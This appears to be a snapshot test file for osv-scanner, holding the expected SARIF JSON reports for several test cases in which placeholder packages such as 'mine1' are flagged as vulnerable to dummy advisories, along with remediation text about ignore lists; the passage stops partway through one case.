"redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1' (also known as 'GHSA-123')." 
}, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1' (also known as 'GHSA-123')." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1", "GHSA-123" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**\n(Also published as: [GHSA-123](https://osv.dev/GHSA-123), ).\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n## [GHSA-123](https://osv.dev/GHSA-123)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as 
the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**\n(Also published as: [GHSA-123](https://osv.dev/GHSA-123), ).\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n## [GHSA-123](https://osv.dev/GHSA-123)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" 
} } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_with_a_max_severity - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1' (also known as 'GHSA-123')." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1' (also known as 'GHSA-123')." 
}, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1", "GHSA-123" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**\n(Also published as: [GHSA-123](https://osv.dev/GHSA-123), ).\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n## [GHSA-123](https://osv.dev/GHSA-123)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**\n(Also published as: [GHSA-123](https://osv.dev/GHSA-123), ).\n\n## 
[OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n## [GHSA-123](https://osv.dev/GHSA-123)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" 
} } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_without_a_max_severity - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1' (also known as 'GHSA-123')." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1' (also known as 'GHSA-123')." 
}, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1", "GHSA-123" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**\n(Also published as: [GHSA-123](https://osv.dev/GHSA-123), ).\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n## [GHSA-123](https://osv.dev/GHSA-123)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**\n(Also published as: [GHSA-123](https://osv.dev/GHSA-123), ).\n\n## 
[OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n## [GHSA-123](https://osv.dev/GHSA-123)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" 
} } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/one_source_with_one_package_with_both_a_version_and_commit_and_one_vulnerability - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@abc123' is vulnerable to 'OSV-1'." 
}, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | abc123 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | abc123 |\n\n## Remediation\n\nIf you believe these 
vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/one_source_with_one_package_with_just_a_commit_and_one_vulnerability - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@abc123' is vulnerable to 'OSV-1'." 
}, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | abc123 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | abc123 |\n\n## Remediation\n\nIf you believe these 
vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1: Something scary!", "text": "OSV-1: Something scary!" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/one_source_with_vulnerabilities,_some_missing_content - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." 
}, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] }, { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine3@0.10.2-rc' is vulnerable to 'OSV-2'." }, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-2", "ruleIndex": 1, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "This vulnerability allows for some very scary stuff to happen - seriously, you'd not believe it!", "text": "This vulnerability allows for some very scary stuff to happen - seriously, you'd not believe it!" 
}, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e This vulnerability allows for some very scary stuff to happen - seriously, you'd not believe it!\n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e This vulnerability allows for some very scary stuff to happen - seriously, you'd not believe it!\n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to 
ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-1", "name": "OSV-1", "relationships": [], "shortDescription": { "markdown": "OSV-1", "text": "OSV-1" } }, { "deprecatedIds": [ "OSV-2" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## [OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine3 | 0.10.2-rc |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-2](https://osv.dev/OSV-2)**.\n\n## [OSV-2](https://osv.dev/OSV-2)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine3 | 0.10.2-rc |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable 
dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-2\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n" }, "id": "OSV-2", "name": "OSV-2", "relationships": [], "shortDescription": { "markdown": "OSV-2", "text": "OSV-2" } } ], "supportedTaxonomies": [], "taxa": [], "version": "2.3.4" }, "extensions": [] }, "translations": [], "versionControlProvenance": [], "webRequests": [], "webResponses": [] } ], "version": "2.1.0" } --- [TestPrintSARIFReport_WithVulnerabilities/two_sources_with_packages,_one_vulnerability - 1] { "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json", "properties": {}, "runs": [ { "addresses": [], "artifacts": [ { "length": -1, "location": { "index": -1, "uri": "file:///path/to/my/first/lockfile" }, "parentIndex": -1, "roles": [] } ], "graphs": [], "invocations": [], "language": "en-US", "logicalLocations": [], "newlineSequences": [ "\r\n", "\n" ], "policies": [], "redactionTokens": [], "results": [ { "attachments": [], "codeFlows": [], "fixes": [], "graphTraversals": [], "graphs": [], "kind": "fail", "level": "warning", "locations": [ { "annotations": [], "id": -1, "logicalLocations": [], "physicalLocation": { "artifactLocation": { "index": -1, "uri": "file:///path/to/my/first/lockfile" } }, "relationships": [] } ], "message": { "arguments": [], "text": "Package 'mine1@1.2.3' is vulnerable to 'OSV-1'." 
}, "partialFingerprints": { "primaryLocationLineHash": "[line-hash]" }, "rank": -1, "relatedLocations": [], "ruleId": "OSV-1", "ruleIndex": 0, "stacks": [], "taxa": [] } ], "runAggregates": [], "taxonomies": [], "threadFlowLocations": [], "tool": { "driver": { "contents": [ "localizedData", "nonLocalizedData" ], "informationUri": "https://github.com/google/osv-scanner", "isComprehensive": false, "language": "en-US", "locations": [], "name": "osv-scanner", "notifications": [], "rules": [ { "deprecatedIds": [ "OSV-1" ], "fullDescription": { "markdown": "", "text": "" }, "help": { "markdown": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## [OSV-1](https://osv.dev/OSV-1)\n\n\u003cdetails\u003e\n\u003csummary\u003eDetails\u003c/summary\u003e\n\n\u003e \n\n\u003c/details\u003e\n\n---\n\n### Affected Packages\n\n| Source | Package Name | Package Version |\n| --- | --- | --- |\n| lockfile:/path/to/my/first/lockfile | mine1 | 1.2.3 |\n\n## Remediation\n\nIf you believe these vulnerabilities do not affect your code and wish to ignore them, add them to the ignore list in an\n`osv-scanner.toml` file located in the same directory as the lockfile containing the vulnerable dependency.\n\nSee the format and more options in our documentation here: https://google.github.io/osv-scanner/configuration/\n\nAdd or append these values to the following config files to ignore this vulnerability:\n\n`/path/to/my/first/osv-scanner.toml`\n\n```\n[[IgnoredVulns]]\nid = \"OSV-1\"\nreason = \"Your reason for ignoring this vulnerability\"\n```\n", "text": "**Your dependency is vulnerable to [OSV-1](https://osv.dev/OSV-1)**.\n\n## 